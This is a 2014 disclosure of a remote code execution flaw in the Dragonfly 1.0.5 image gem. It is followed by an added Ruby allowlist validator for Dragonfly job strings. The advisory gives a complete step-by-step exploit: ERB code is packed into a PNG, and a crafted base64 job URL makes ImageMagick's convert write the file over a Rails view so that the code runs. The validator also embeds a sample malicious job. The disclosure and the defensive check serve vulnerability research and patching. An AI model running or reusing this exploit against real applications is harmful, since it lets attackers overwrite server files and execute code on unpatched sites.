
Dragonfly 1.0.5 Remote Code Execution

Posted on 26 August 2014

RCE in the Dragonfly gem for image uploading & processing in Rails/Sinatra, version 1.0.5 (https://github.com/markevans/dragonfly). The underlying vulnerability is that you can pass arbitrary commands to ImageMagick's convert, thus granting arbitrary read/write on the filesystem. Additionally the -process flag seems to be able to load custom modules, which might result in execution of arbitrary files.

Here is a description of _one_ way to abuse the RCE vulnerability:

```
$ cat exploit.rb
<%= puts "I got ownd" %>
<% require 'pry' %>
<% binding.pry %>
$ wc exploit.rb
 3 13 63 exploit.rb
```

The char length needs to be a multiple of 3 (21x3 = 63) because every pixel in the PNG will contain 1 byte per colour channel:

```
$ convert -size "21x1" -depth 8 rgb:exploit.rb exploit.png
```

Test that everything went well; the diff should not show any differences:

```
$ convert exploit.png test.rgb
$ diff test.rgb exploit.rb
```

Upload the picture and copy the image URL, e.g.:

http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0

Open pry or irb and run:

```ruby
require 'base64'
require 'json'

Base64.decode64 "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsInRodW1iIiwiNDAweDIwMCMiXV0"
# => "[["f","2014/08/10/7i7j215lhg_exploit.png"],["p","thumb","400x200#"]]"

# the job string is the base64 of the JSON step list, so build the new one the same way
Base64.strict_encode64([["f","2014/08/10/7i7j215lhg_exploit.png"],["p","convert","-write rgb:/path/to/rails/app/views/photos/index.html.erb"]].to_json)
# => "W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0="
```

Go to your browser and request:

http://domain.tld/media/W1siZiIsIjIwMTQvMDgvMTAvN2k3ajIxNWxoZ19leHBsb2l0LnBuZyJdLFsicCIsImNvbnZlcnQiLCItd3JpdGUgcmdiOi9wYXRoL3RvL3JhaWxzL2FwcC92aWV3cy9waG90b3MvaW5kZXguaHRtbC5lcmIiXV0=

and then:

http://domain.tld/photos/

which will open app/views/photos/index.html.erb and spawn a pry on the terminal you started rails server from.
Of course you can use ImageMagick flags other than -write to achieve the same code execution, so this really calls for a whitelist that restricts the commands that can be sent to ImageMagick. The author was contacted and committed "fixes" (Dragonfly version 1.0.6, https://github.com/markevans/dragonfly/commit/e88afeceb036fe4d44f7c7787c7e988e1350c2dc#diff-d41d8cd98f00b204e9800998ecf8427e). The main fix seems to be the rename of 'dos_prevention' to 'verify urls (recommended)'. Needless to say, many websites out there will still disable the verification for ease of deployment, e.g. for JavaScript that requests thumbnail versions of images. Note that this vulnerability is still exploitable if the attacker is unable to upload images, by using the generators to "draw" arbitrary images via ImageMagick commands.

cheers, coco & leex

http://hexgolems.com/fd/dragonfly.txt
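The whitelist the advisory asks for, as an added defender-side example that is not part of the advisory or of Dragonfly's own code: it decodes the job string from a /media/<job> URL (assumed, as shown above, to be the base64-encoded JSON list of steps), refuses any "p" step whose processor is not on an explicit allowlist, and also refuses "g" generator steps, which the closing note identifies as the upload-free path. The allowlist contents and the sample jobs are constructed for this example.

```ruby
require 'base64'
require 'json'

# Processors this (hypothetical) deployment actually needs; everything else is refused.
ALLOWED_PROCESSORS = %w[thumb].freeze
# The only argument 'thumb' should ever receive is a geometry string such as "400x200#".
THUMB_GEOMETRY = /\A\d*x\d*[#>!<]?\z/

# Decode the job string from /media/<job>: base64 of a JSON array of steps such as
# ["f", path] (fetch), ["p", processor, *args] (process) or ["g", generator, *args].
def decode_job(encoded)
  steps = JSON.parse(Base64.decode64(encoded)) # decode64 tolerates stripped '=' padding
  unless steps.is_a?(Array) && steps.all? { |s| s.is_a?(Array) && s.first.is_a?(String) }
    raise ArgumentError, 'job is not a JSON array of steps'
  end
  steps
rescue JSON::ParserError
  raise ArgumentError, 'job is not valid JSON'
end

# Return every reason the job must be refused; an empty list means it passes the allowlist.
def job_violations(encoded)
  decode_job(encoded).each_with_object([]) do |(kind, name, *args), bad|
    case kind
    when 'f' # fetch: only plain relative paths inside the upload store
      bad << "suspicious fetch path: #{name}" if name.to_s.start_with?('/') || name.to_s.include?('..')
    when 'p' # process: allow-listed processor with a constrained argument shape
      if !ALLOWED_PROCESSORS.include?(name)
        bad << "processor not allow-listed: #{name}"
      elsif !(args.size == 1 && args[0].to_s.match?(THUMB_GEOMETRY))
        bad << "unexpected thumb arguments: #{args.inspect}"
      end
    else # 'g' generators ("draw" arbitrary images without an upload) and anything unknown
      bad << "step kind not allow-listed: #{kind}"
    end
  end
end

def job_allowed?(encoded)
  job_violations(encoded).empty?
end

# Constructed sample jobs, encoded the way the advisory's URLs are built (base64 of JSON).
BENIGN_JOB    = Base64.strict_encode64([['f', '2014/08/10/cat.png'], ['p', 'thumb', '400x200#']].to_json)
MALICIOUS_JOB = Base64.strict_encode64([['f', '2014/08/10/cat.png'],
                                        ['p', 'convert', '-write rgb:/PLACEHOLDER/app/views/index.html.erb']].to_json)

if __FILE__ == $PROGRAM_NAME
  puts "benign:    #{job_violations(BENIGN_JOB).inspect}"    # []
  puts "malicious: #{job_violations(MALICIOUS_JOB).inspect}" # ["processor not allow-listed: convert"]
end
```

Running this check in the controller before the job is handed to Dragonfly complements, rather than replaces, the signed-URL verification that 1.0.6 recommends.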
